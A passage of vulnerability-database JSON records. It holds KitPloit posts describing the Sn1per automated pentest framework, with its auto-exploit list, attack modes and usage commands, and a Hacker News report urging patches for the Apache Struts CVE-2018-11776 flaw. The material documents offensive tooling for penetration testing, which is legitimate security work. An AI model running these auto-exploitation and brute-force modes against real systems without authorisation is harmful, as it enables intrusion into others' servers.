"COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2251", "CVE-2017-5638", "CVE-2018-11776"], "modified": "2018-08-26T21:14:01", "id": "KITPLOIT:4611207874033525364", "href": "http://www.kitploit.com/2018/08/apache-struts-v3-tool-to-exploit-3-rce.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-05T20:49:44", "description": "[](<https://1.bp.blogspot.com/-Poffj1hNPBk/XNXfkZuyGfI/AAAAAAAAO0U/k4nQgdLXOoEZMOGlGb3wgnx8HgQzEtacgCLcBGAs/s1600/Sn1per_1_Sn1per.jpeg>)\n\n \n\n\nSn1per Community Edition is an [automated scanner](<https://www.kitploit.com/search/label/Automated%20scanner> 
\"automated scanner\" ) that can be used during a [penetration test](<https://www.kitploit.com/search/label/Penetration%20Test> \"penetration test\" ) to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes. For more information regarding Sn1per Professional, go to [https://xerosecurity.com](<https://xerosecurity.com/> \"https://xerosecurity.com\" ).\n\n \n**SN1PER PROFESSIONAL FEATURES:** \n \n**Professional reporting interface** \n \n\n\n[](<https://2.bp.blogspot.com/-HnwS8O0KEik/XNXfrGJWPeI/AAAAAAAAO0Y/94Hl4CC3M_kytYKkKldzXNviz4ff92TVACLcBGAs/s1600/Sn1per_8.png>)\n\n \n**Slideshow for all gathered screenshots** \n \n\n\n[](<https://2.bp.blogspot.com/-coOpsZX0XMM/XNXfuVNicUI/AAAAAAAAO0c/Wd2EQSAcI4Uti3bkaa1kxqajpStfjTK0ACLcBGAs/s1600/Sn1per_9.png>)\n\n \n**Searchable and sortable DNS, IP and open port database** \n \n\n\n[](<https://4.bp.blogspot.com/-bfzb6vLbCks/XNXfy5vfkTI/AAAAAAAAO0g/9aO7_9YKrqMyWK3PehtfItlm4DZ6KWR4gCLcBGAs/s1600/Sn1per_10.png>)\n\n \n**Detailed host reports** \n \n\n\n[](<https://4.bp.blogspot.com/-JbxR5Z-2O_4/XNXf2YbT_DI/AAAAAAAAO0o/w8Hin6Cbf1Ue4QbVW70T2-r1Rj82wDsSQCLcBGAs/s1600/Sn1per_11.png>)\n\n \n**NMap HTML host reports** \n \n\n\n[](<https://2.bp.blogspot.com/-TYr4tFOy7Y4/XNXf7dXeSII/AAAAAAAAO0w/0YMKst5KHGoygojHG2r6tJxqkg2a-w1YQCLcBGAs/s1600/Sn1per_12.png>)\n\n \n**Quick links to online recon tools and Google hacking queries** \n \n\n\n[](<https://1.bp.blogspot.com/-FNe1YF5mg68/XNXgAPQOAEI/AAAAAAAAO00/5uuuQo2KqRgwpTE11Z-U6p_XGetjCf9vgCLcBGAs/s1600/Sn1per_13.png>)\n\n \n**Takeovers and Email Security** \n \n\n\n[](<https://2.bp.blogspot.com/-FNah2OwM_nU/XNXgEeJZG9I/AAAAAAAAO08/A7lu1554nJ0GpEOj7AtdZ_emSoyq5lBxQCLcBGAs/s1600/Sn1per_14.png>)\n\n \n**HTML5 Notepad** \n 
\n\n\n[](<https://2.bp.blogspot.com/-DHOnECOz-T0/XNXgH_QX4JI/AAAAAAAAO1E/s0bFVC-Uf_87tBFY2AJwiJyHgKJ8VgKXQCLcBGAs/s1600/Sn1per_15.png>)\n\n \n**ORDER SN1PER PROFESSIONAL:** \nTo obtain a Sn1per Professional license, go to [https://xerosecurity.com](<https://xerosecurity.com/> \"https://xerosecurity.com\" ). \n \n**DEMO VIDEO:** \n \n \n\n\n[](<https://asciinema.org/a/IDckE48BNSWQ8TV8yEjJjjMNm>)\n\n \n \n**SN1PER COMMUNITY FEATURES:** \n\n\n * Automatically collects basic recon (i.e. whois, ping, DNS, etc.)\n * Automatically launches Google hacking queries against a target domain\n * Automatically enumerates open ports via NMap port scanning\n * Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers\n * Automatically checks for sub-domain hijacking\n * Automatically runs targeted NMap scripts against open ports\n * Automatically runs targeted Metasploit scan and exploit modules\n * Automatically scans all web applications for common vulnerabilities\n * Automatically brute forces ALL open services\n * Automatically tests for anonymous FTP access\n * Automatically runs WPScan, Arachni and Nikto for all web services\n * Automatically enumerates NFS shares\n * Automatically tests for anonymous LDAP access\n * Automatically enumerates SSL/TLS ciphers, protocols and vulnerabilities\n * Automatically enumerates SNMP community strings, services and users\n * Automatically lists SMB users and shares, checks for NULL sessions and exploits MS08-067\n * Automatically exploits vulnerable JBoss, Java RMI and Tomcat servers\n * Automatically tests for open X11 servers\n * Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds\n * Performs high level enumeration of multiple hosts and subnets\n * Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting\n * Automatically gathers screenshots of all web sites\n * Creates individual workspaces to store all scan output\n \n**EXPLOITS:** \n\n\n * Drupal RESTful Web 
Services unserialize() SA-CORE-2019-003\n * Apache Struts: S2-057 (CVE-2018-11776): Security updates available for Apache Struts\n * Drupal: CVE-2018-7600: [Remote Code Execution](<https://www.kitploit.com/search/label/Remote%20Code%20Execution> \"Remote Code Execution\" ) \\- SA-CORE-2018-002\n * GPON Routers - Authentication Bypass / [Command Injection](<https://www.kitploit.com/search/label/Command%20Injection> \"Command Injection\" ) CVE-2018-10561\n * MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption\n * Apache Tomcat: Remote Code Execution (CVE-2017-12617)\n * Oracle WebLogic wls-wsat Component Deserialization Remote Code Execution CVE-2017-10271\n * Apache Struts Content-Type arbitrary command execution (CVE-2017-5638)\n * Apache Struts 2 Framework Checks - REST plugin with XStream handler (CVE-2017-9805)\n * Microsoft IIS WebDav ScStoragePathFromUrl Overflow CVE-2017-7269\n * ManageEngine Desktop Central 9 FileUploadServlet ConnectionId Vulnerability CVE-2015-8249\n * Shellshock Bash Shell remote code execution CVE-2014-6271\n * HeartBleed OpenSSL Detection CVE-2014-0160\n * MS12-020: Vulnerabilities in Remote Desktop Could Allow Remote Code Execution (2671387)\n * Tomcat Application Manager Default Ovwebusr Password Vulnerability CVE-2009-3843\n * MS08-067 Microsoft Server Service Relative Path Stack Corruption\n * Webmin File Disclosure CVE-2006-3392\n * VsFTPd 2.3.4 Backdoor\n * ProFTPd 1.3.3C Backdoor\n * MS03-026 Microsoft RPC DCOM Interface Overflow\n * DistCC Daemon Command Execution\n * JBoss Java De-Serialization\n * HTTP Writable Path PUT/DELETE File Access\n * Apache Tomcat User Enumeration\n * Tomcat Application Manager Login Bruteforce\n * Jenkins-CI Enumeration\n * HTTP WebDAV Scanner\n * Android Insecure ADB\n * Anonymous FTP Access\n * PHPMyAdmin Backdoor\n * PHPMyAdmin Auth Bypass\n * OpenSSH User Enumeration\n * LibSSH Auth Bypass\n * SMTP User 
Enumeration\n * Public NFS Mounts\n \n**KALI LINUX INSTALL:** \n\n \n \n bash install.sh\n\n \n**UBUNTU/DEBIAN/PARROT INSTALL:** \n\n \n \n bash install_debian_ubuntu.sh\n\n \n**DOCKER INSTALL:** (build from the Dockerfile in the repository root) \n\n \n \n docker build -t sn1per .\n\n \n**USAGE:** \n\n \n \n [*] NORMAL MODE\n sniper -t|--target <TARGET>\n \n [*] NORMAL MODE + OSINT + RECON + FULL PORT SCAN + BRUTE FORCE\n sniper -t|--target <TARGET> -o|--osint -re|--recon -fp|--fullportonly -b|--bruteforce\n \n [*] STEALTH MODE + OSINT + RECON\n sniper -t|--target <TARGET> -m|--mode stealth -o|--osint -re|--recon\n \n [*] DISCOVER MODE\n sniper -t|--target <CIDR> -m|--mode discover -w|--workspace <WORKSPACE_ALIAS>\n \n [*] FLYOVER MODE\n sniper -t|--target <TARGET> -m|--mode flyover -w|--workspace <WORKSPACE_ALIAS>\n \n [*] AIRSTRIKE MODE\n sniper -f|--file /full/path/to/targets.txt -m|--mode airstrike\n \n [*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLED\n sniper -f|--file /full/path/to/targets.txt -m|--mode nuke -w|--workspace <WORKSPACE_ALIAS>\n \n [*] SCAN ONLY SPECIFIC PORT\n sniper -t|--target <TARGET> -m port -p|--port <portnum>\n \n [*] FULLPORTONLY SCAN MODE\n sniper -t|--target <TARGET> -fp|--fullportonly\n \n [*] PORT SCAN MODE\n sniper -t|--target <TARGET> -m|--mode port -p|--port <PORT_NUM>\n \n [*] WEB MODE - PORT 80 + 443 ONLY!\n sniper -t|--target <TARGET> -m|--mode web\n \n [*] HTTP WEB PORT HTTP MODE\n sniper -t|--target <TARGET> -m|--mode webporthttp -p|--port <port>\n \n [*] HTTPS WEB PORT HTTPS MODE\n sniper -t|--target <TARGET> -m|--mode webporthttps -p|--port <port>\n \n [*] WEBSCAN MODE\n sniper -t|--target <TARGET> -m|--mode webscan\n \n [*] ENABLE BRUTEFORCE\n sniper -t|--target <TARGET> -b|--bruteforce\n \n [*] ENABLE LOOT IMPORTING INTO METASPLOIT\n sniper -t|--target <TARGET>\n \n [*] LOOT REIMPORT FUNCTION\n sniper -w <WORKSPACE_ALIAS> --reimport\n \n [*] LOOT REIMPORTALL FUNCTION\n sniper -w 
<WORKSPACE_ALIAS> --reimportall\n \n [*] DELETE WORKSPACE\n sniper -w <WORKSPACE_ALIAS> -d\n \n [*] DELETE HOST FROM WORKSPACE\n sniper -w <WORKSPACE_ALIAS> -t <TARGET> -dh\n \n [*] SCHEDULED SCANS\n sniper -w <WORKSPACE_ALIAS> -s daily|weekly|monthly\n \n [*] SCAN STATUS\n sniper --status\n \n [*] UPDATE SNIPER\n sniper -u|--update\n\n \n**MODES:** \n\n\n * **NORMAL:** Performs basic scan of targets and open ports using both active and passive checks for optimal performance.\n * **STEALTH:** Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking.\n * **FLYOVER:** Fast multi-threaded high level scans of multiple targets (useful for collecting high level data on many hosts quickly).\n * **AIRSTRIKE:** Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, list the hosts or IPs to be scanned in a file and run sniper -f /full/path/to/targets.txt -m airstrike to begin scanning.\n * **NUKE:** Launch full audit of multiple hosts specified in text file of choice. Usage example: sniper -f /pentest/loot/targets.txt -m nuke.\n * **DISCOVER:** Parses all hosts on a subnet/CIDR (e.g. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans.\n * **PORT:** Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.\n * **FULLPORTONLY:** Performs a full detailed port scan and saves results to XML.\n * **WEB:** Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). 
Ideal for web applications but may increase scan time significantly.\n * **WEBPORTHTTP:** Launches a full HTTP web application scan against a specific host and port.\n * **WEBPORTHTTPS:** Launches a full HTTPS web application scan against a specific host and port.\n * **WEBSCAN:** Launches a full HTTP & HTTPS web application scan via Burp Suite and Arachni.\n \n**SAMPLE REPORT:** \n<https://gist.github.com/1N3/8214ec2da2c91691bcbc> \n \n \n\n\n**[Download Sn1per](<https://github.com/1N3/Sn1per> \"Download Sn1per\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2019-05-12T13:09:00", "type": "kitploit", "title": "Sn1per v7.0 - Automated Pentest Framework For Offensive Security Experts", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-3392", "CVE-2009-3843", "CVE-2014-0160", "CVE-2014-6271", "CVE-2015-8249", "CVE-2017-10271", "CVE-2017-12617", "CVE-2017-5638", "CVE-2017-7269", "CVE-2017-9805", "CVE-2018-10561", "CVE-2018-11776", "CVE-2018-7600"], "modified": "2019-05-12T13:09:05", "id": "KITPLOIT:7013881512724945934", "href": 
"http://www.kitploit.com/2019/05/sn1per-v70-automated-pentest-framework.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-05T20:50:26", "description": "[](<https://4.bp.blogspot.com/-P3_9VWnPhLw/WzvPRBF6q3I/AAAAAAAALtk/nE4XtcDGmXELo4KLTzEDoCiNMEgF0VJAACLcBGAs/s1600/Sn1per_1_Sn1per.jpeg>)\n\n \n\n\nSn1per Community Edition is an [automated scanner](<https://www.kitploit.com/search/label/Automated%20scanner>) that can be used during a [penetration test](<https://www.kitploit.com/search/label/Penetration%20Test>) to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes.\n\n \n**SN1PER PROFESSIONAL FEATURES:** \n \n**Professional reporting interface** \n \n\n\n[](<https://3.bp.blogspot.com/-CUaHGxKs7i8/WzvPDvnvnUI/AAAAAAAALtg/6NzvIUFvET0YO8X9SXkxbSXD51R9dgn_QCLcBGAs/s1600/Sn1per_8.png>)\n\n \n**Slideshow for all gathered screenshots** \n \n\n\n[](<https://3.bp.blogspot.com/-ElnqBSUrveU/WzvPZw0s4FI/AAAAAAAALto/xOUximDoNkMni5XhkzmMDnI9caTUWdo3gCLcBGAs/s1600/Sn1per_9.png>)\n\n \n**Searchable and sortable DNS, IP and open port database** \n \n\n\n[](<https://3.bp.blogspot.com/-U5MHC2iK1ag/WzvPfoIz6nI/AAAAAAAALts/m-GOz4roSSEhYjSeZgakgEJxo4-xCSlIQCLcBGAs/s1600/Sn1per_10.png>)\n\n \n \n**Categorized host reports** \n \n\n\n[](<https://4.bp.blogspot.com/-b82btbNLylE/WzvPj6ds37I/AAAAAAAALt0/KgxDw1g6rCgCuDamA3v_GBIHTAs-No2DwCLcBGAs/s1600/Sn1per_11.png>)\n\n \n \n**Quick links to online recon tools and Google hacking queries** \n \n\n\n[](<https://4.bp.blogspot.com/-eB0eLBg1-Xs/WzvPsgtbmGI/AAAAAAAALt8/FSkOuUJlOb0YXRetzL4TYbuLeOmRaQtOwCLcBGAs/s1600/Sn1per_12.png>)\n\n \n**Personalized notes field for each host** \n \n\n\n[](<https://1.bp.blogspot.com/-4SndSkZX88U/WzvPxUain4I/AAAAAAAALuE/x7ZucGGcTPIOGerWwlbWvXrFVosouiOhwCLcBGAs/s1600/Sn1per_13.png>)\n\n 
\n \n**DEMO VIDEO:** \n[](<https://asciinema.org/a/IDckE48BNSWQ8TV8yEjJjjMNm>) \n \n**SN1PER COMMUNITY FEATURES:** \n\n\n * Automatically collects basic recon (i.e. whois, ping, DNS, etc.)\n * Automatically launches Google hacking queries against a target domain\n * Automatically enumerates open ports via NMap port scanning\n * Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers\n * Automatically checks for sub-domain hijacking\n * Automatically runs targeted NMap scripts against open ports\n * Automatically runs targeted Metasploit scan and exploit modules\n * Automatically scans all web applications for common vulnerabilities\n * Automatically brute forces ALL open services\n * Automatically tests for anonymous FTP access\n * Automatically runs WPScan, Arachni and Nikto for all web services\n * Automatically enumerates NFS shares\n * Automatically tests for anonymous LDAP access\n * Automatically enumerates SSL/TLS ciphers, protocols and vulnerabilities\n * Automatically enumerates SNMP community strings, services and users\n * Automatically lists SMB users and shares, checks for NULL sessions and exploits MS08-067\n * Automatically exploits vulnerable JBoss, Java RMI and Tomcat servers\n * Automatically tests for open X11 servers\n * Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds\n * Performs high level enumeration of multiple hosts and subnets\n * Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting\n * Automatically gathers screenshots of all web sites\n * Creates individual workspaces to store all scan output\n \n**AUTO-PWN:** \n\n\n * Drupal Drupalgedon2 RCE CVE-2018-7600\n * GPON Router RCE CVE-2018-10561\n * [Apache Struts](<https://www.kitploit.com/search/label/Apache%20Struts>) 2 (Jakarta multipart parser) RCE CVE-2017-5638\n * Apache Struts 2 RCE CVE-2017-9805\n * Shellshock GNU Bash RCE CVE-2014-6271\n * HeartBleed OpenSSL Detection CVE-2014-0160\n * 
Default Apache Tomcat Creds CVE-2009-3843\n * MS Windows SMB RCE MS08-067\n * Webmin File Disclosure CVE-2006-3392\n * [Anonymous FTP](<https://www.kitploit.com/search/label/Anonymous%20FTP>) Access\n * PHPMyAdmin Backdoor RCE\n * PHPMyAdmin Auth Bypass\n * JBoss Java De-Serialization RCEs\n \n**KALI LINUX INSTALL:** \n\n \n \n ./install.sh\n\n \n**DOCKER INSTALL:** \nCredits: @menzow \nDocker Install: <https://github.com/menzow/sn1per-docker> \nDocker Build: <https://hub.docker.com/r/menzo/sn1per-docker/builds/bqez3h7hwfun4odgd2axvn4/> \nExample usage: \n\n \n \n $ docker pull menzo/sn1per-docker\n $ docker run --rm -ti menzo/sn1per-docker sniper menzo.io\n\n \n**USAGE:** \n\n \n \n [*] NORMAL MODE\n sniper -t|--target <TARGET>\n \n [*] NORMAL MODE + OSINT + RECON\n sniper -t|--target <TARGET> -o|--osint -re|--recon\n \n [*] STEALTH MODE + OSINT + RECON\n sniper -t|--target <TARGET> -m|--mode stealth -o|--osint -re|--recon\n \n [*] DISCOVER MODE\n sniper -t|--target <CIDR> -m|--mode discover -w|--workspace <WORKSPACE_ALIAS>\n \n [*] SCAN ONLY SPECIFIC PORT\n sniper -t|--target <TARGET> -m port -p|--port <portnum>\n \n [*] FULLPORTONLY SCAN MODE\n sniper -t|--target <TARGET> -fp|--fullportonly\n \n [*] PORT SCAN MODE\n sniper -t|--target <TARGET> -m|--mode port -p|--port <PORT_NUM>\n \n [*] WEB MODE - PORT 80 + 443 ONLY!\n sniper -t|--target <TARGET> -m|--mode web\n \n [*] HTTP WEB PORT MODE\n sniper -t|--target <TARGET> -m|--mode webporthttp -p|--port <port>\n \n [*] HTTPS WEB PORT MODE\n sniper -t|--target <TARGET> -m|--mode webporthttps -p|--port <port>\n \n [*] ENABLE BRUTEFORCE\n sniper -t|--target <TARGET> -b|--bruteforce\n \n [*] AIRSTRIKE MODE\n sniper -f|--file /full/path/to/targets.txt -m|--mode airstrike\n \n [*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLED\n sniper -f|--file /full/path/to/targets.txt -m|--mode nuke -w|--workspace <WORKSPACE_ALIAS>\n \n [*] ENABLE LOOT 
IMPORTING INTO METASPLOIT\n sniper -t|--target <TARGET>\n \n [*] LOOT REIMPORT FUNCTION\n sniper -w <WORKSPACE_ALIAS> --reimport\n \n [*] UPDATE SNIPER\n sniper -u|--update\n\n \n**MODES:** \n\n\n * **NORMAL:** Performs basic scan of targets and open ports using both active and passive checks for optimal performance.\n * **STEALTH:** Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking.\n * **AIRSTRIKE:** Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, list the hosts or IPs to be scanned in a file and run sniper -f /full/path/to/targets.txt -m airstrike to begin scanning.\n * **NUKE:** Launch full audit of multiple hosts specified in text file of choice. Usage example: sniper -f /pentest/loot/targets.txt -m nuke.\n * **DISCOVER:** Parses all hosts on a subnet/CIDR (e.g. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans.\n * **PORT:** Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.\n * **FULLPORTONLY:** Performs a full detailed port scan and saves results to XML.\n * **WEB:** Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). 
Ideal for web applications but may increase scan time significantly.\n * **WEBPORTHTTP:** Launches a full HTTP web application scan against a specific host and port.\n * **WEBPORTHTTPS:** Launches a full HTTPS web application scan against a specific host and port.\n * **UPDATE:** Checks for updates and upgrades all components used by sniper.\n * **REIMPORT:** Reimport all workspace files into Metasploit and reproduce all reports.\n * **RELOAD:** Reload the master workspace report.\n \n**SAMPLE REPORT:** \n<https://gist.github.com/1N3/8214ec2da2c91691bcbc> \n \n \n\n\n**[Download Sn1per v5.0](<https://github.com/1N3/Sn1per>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-07-05T13:45:00", "type": "kitploit", "title": "Sn1per v5.0 - Automated Pentest Recon Scanner", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-3392", "CVE-2009-3843", "CVE-2014-0160", "CVE-2014-6271", "CVE-2017-5638", "CVE-2017-9805", "CVE-2018-10561", "CVE-2018-7600"], "modified": "2018-07-05T13:45:01", "id": "KITPLOIT:7835941952769002973", "href": "http://www.kitploit.com/2018/07/sn1per-v50-automated-pentest-recon.html", "cvss": 
{"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-05T20:50:06", "description": "Sn1per v6.0 release post; its body is a verbatim copy of the Sn1per v5.0 post above (same feature list, AUTO-PWN list, install, usage and modes).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-11-24T12:43:00", "type": "kitploit", "title": "Sn1per v6.0 - Automated Pentest Framework For Offensive Security Experts", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-3392", "CVE-2009-3843", "CVE-2014-0160", "CVE-2014-6271", "CVE-2017-5638", "CVE-2017-9805", "CVE-2018-10561", "CVE-2018-7600"], "modified": "2018-11-24T12:43:00", "id": "KITPLOIT:8672599587089685905", "href": 
"http://www.kitploit.com/2018/11/sn1per-v60-automated-pentest-framework.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-05-09T12:40:18", "description": "[](<https://thehackernews.com/images/-ktDJMSI6Gdo/W310Im7Od5I/AAAAAAAAx8k/iNNQd5VURi8zRV8-MZosbkEo-V4eXjqowCLcBGAs/s728-e100/apache-struts-vulnerability-hacking.png>)\n\nSemmle security researcher Man Yue Mo has [disclosed](<https://lgtm.com/blog/apache_struts_CVE-2018-11776>) a critical remote code execution vulnerability in the popular Apache Struts web application framework that could allow remote attackers to run malicious code on the affected servers. \n \nApache Struts is an open source framework for developing web applications in the Java programming language and is widely used by enterprises globally, including by 65 percent of the Fortune 100 companies, like Vodafone, Lockheed Martin, Virgin Atlantic, and the IRS. \n \nThe vulnerability (**CVE-2018-11776**) resides in the core of Apache Struts and originates because of insufficient validation of user-provided untrusted inputs in the core of the Struts framework under certain configurations. \n \nThe newly found Apache Struts exploit can be triggered just by visiting a specially crafted URL on the affected web server, allowing attackers to execute malicious code and eventually take complete control over the targeted server running the vulnerable application. \n \n\n\n## Struts2 Vulnerability - Are You Affected?\n\n \nAll applications that use Apache Struts\u2014supported versions (Struts 2.3 to Struts 2.3.34, and Struts 2.5 to Struts 2.5.16) and even some unsupported Apache Struts versions\u2014are potentially vulnerable to this flaw, even when no additional plugins have been enabled. 
\n \n\n\n> \"This vulnerability affects commonly-used endpoints of Struts, which are likely to be exposed, opening up an attack vector to malicious hackers,\" Yue Mo said.\n\n \nYour Apache Struts implementation is vulnerable to the reported RCE flaw if it meets the following conditions: \n\n\n * The **alwaysSelectFullNamespace** flag is set to true in the Struts configuration.\n * Struts configuration file contains an \"action\" or \"url\" tag that does not specify the optional namespace attribute or specifies a wildcard namespace.\nAccording to the researcher, even if an application is currently not vulnerable, \"an inadvertent change to a Struts configuration file may render the application vulnerable in the future.\" \n \n\n\n## Here's Why You Should Take Apache Struts Exploit Seriously\n\n \nLess than a year ago, credit rating agency Equifax exposed [personal details of its 147 million consumers](<https://thehackernews.com/2017/09/equifax-apache-struts.html>) due to their failure of patching a similar [Apache Struts flaw](<https://thehackernews.com/2017/03/apache-struts-framework.html>) that was disclosed earlier that year (CVE-2017-5638). \n \nThe Equifax breach cost the company over $600 million in losses. \n\n\n> \"Struts is used for publicly-accessible customer-facing websites, vulnerable systems are easily identified, and the flaw is easy to exploit,\" said Pavel Avgustinov, Co-founder & VP of QL Engineering at Semmle.\n\n> \"A hacker can find their way in within minutes, and exfiltrate data or stage further attacks from the compromised system.\"\n\n \n\n\n## Patch Released for Critical Apache Struts Bug\n\n[](<https://thehackernews.com/images/-aZ6JnELsib4/W31pGhAz6bI/AAAAAAAAx8M/0d3umSPy5YATSc8sNXCx5cKejhIftncEgCLcBGAs/s728-e100/apache-struts-vulnerability-exploit.png>)\n\nApache Struts has fixed the vulnerability with the release of Struts versions 2.3.35 and 2.5.17. 
Organizations and developers who use Apache Struts are urgently advised to upgrade their Struts components as soon as possible. \n \nWe have seen how previous disclosures of similar critical flaws in Apache Struts have resulted in [PoC exploits](<https://thehackernews.com/2017/03/apache-struts-framework.html>) being published within a day, and exploitation of the [vulnerability in the wild](<https://thehackernews.com/2017/09/equifax-credit-report-hack.html>), putting critical infrastructure as well as customers' data at risk. \n \nTherefore, users and administrators are strongly advised to upgrade their Apache Struts components to the latest versions, even if they believe their configuration is not vulnerable right now. \n \nThis is not the first time the Semmle Security Research Team has reported a critical RCE flaw in Apache Struts. Less than a year ago, the team disclosed a similar [remote code execution vulnerability](<https://thehackernews.com/2017/09/apache-struts-vulnerability.html>) (CVE-2017-9805) in Apache Struts. 
\n \n\n\n## UPDATE \u2014 Apache Struts RCE Exploit PoC Released\n\n[](<https://thehackernews.com/images/-fNjQzu1b7iw/W376YS-nYjI/AAAAAAAAx9I/T7MopN2IxtwTxicu4k8j55ywy0GbIRQHgCLcBGAs/s728-e100/apache-struts-exploit-poc-rce-vulnerability.png>)\n\nA security researcher has today released [a PoC exploit](<https://github.com/jas502n/St2-057/blob/master/README.md>) for the newly discovered remote code execution (RCE) vulnerability (CVE-2018-11776) in Apache Struts web application framework.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-08-22T14:04:00", "type": "thn", "title": "New Apache Struts RCE Flaw Lets Hackers Take Over Web Servers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805", "CVE-2018-11776"], "modified": "2018-08-23T18:30:56", "id": "THN:89C2482FECD181DD37C6DAEEB7A66FA9", "href": 